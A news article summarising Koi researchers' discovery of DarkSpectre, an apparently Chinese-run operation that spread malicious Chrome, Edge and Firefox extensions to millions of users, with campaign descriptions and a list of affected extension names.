In a nutshell: Cybersecurity researchers at Koi recently uncovered DarkSpectre, a Chinese operation linking multiple malicious campaigns through browser extensions. Hundreds of seemingly legitimate add-ons were downloaded by more than 8.8 million users, leaving them vulnerable to security issues over the seven-year lifespan of the operation.
The researchers initially discovered DarkSpectre while investigating ShadyPanda, a campaign based on popular Chrome and Edge extensions that infected over four million devices. Further analysis revealed that ShadyPanda was just one part of a three-pronged operation, each campaign following similar methods and malicious objectives.
The infrastructure tied to ShadyPanda led researchers to other campaigns, which used the same hidden domains. These domains, in turn, were connected to additional extensions available across multiple browser marketplaces, including Firefox, Edge, and Chrome.
DarkSpectre consists of three primary campaigns: The Zoom Stealer, which infected 2.2 million users across Firefox, Chrome, and Edge; ShadyPanda, affecting 5.6 million users on the same browsers; and GhostPoster, impacting 1.05 million Firefox instances. At first glance, the extensions appeared legitimate, making it easy for users to install them on their devices without suspicion.
The threat was designed to activate at a later date, with Chinese hackers delivering the actual malicious payload from a command-and-control server through hidden JavaScript code. However, the three campaigns were reportedly intended to target different types of users.
According to Koi, ShadyPanda was created for large-scale surveillance and affiliate fraud. The related extensions remained active for several years before the hackers "weaponized" them through time-delayed activation and remote code injection.
The Trojan Image campaign embedded a stealthy payload inside a PNG icon file using steganography. The extensions would load the image, extract the hidden JavaScript, and execute the payload after a 48-hour delay.
Here are some of the names of the browser extensions exploited by the DarkSpectre threat actor:
- Chrome Audio Capture
- ZED: Zoom Easy Downloader
- X (Twitter) Video Downloader
- Google Meet Auto Admit
- Zoom.us Always Show "Join From Web"
- Timer for Google Meet
- CVR: Chrome Video Recorder
- GoToWebinar & GoToMeeting Download Recordings
- Meet Auto Admit
- Google Meet Tweak (Emojis, Text, Cam Effects)
- Mute All on Meet
- Google Meet Push-To-Talk
- Photo Downloader for Facebook, Instagram
- Zoomcoder Extension
- Auto-join for Google Meet
- Edge Audio Capture (Edge)
- Twitter X Video Downloader (Firefox)
- New Tab – Customized Dashboard (Edge)
- "Google Translate" by charliesmithbons
Zoom Stealer targeted corporate meeting intelligence, allegedly supporting more than 28 video conferencing platforms. Using WebSocket-based real-time data exfiltration, the hackers reportedly gained access to meeting links, credentials, dossiers, and other sensitive corporate information.
The DarkSpectre operation likely points to a well-resourced Chinese state-sponsored group. This actor consistently hosts C2 servers on Alibaba Cloud, leverages China-based internet content providers, and includes Chinese-language strings throughout the codebase.
"The combination of patience, scale, technical sophistication, and operational diversity points to an adversary with substantial resources and long-term strategic goals," the analysts concluded.
DarkSpectre quietly infected millions through seemingly legit browser extensions
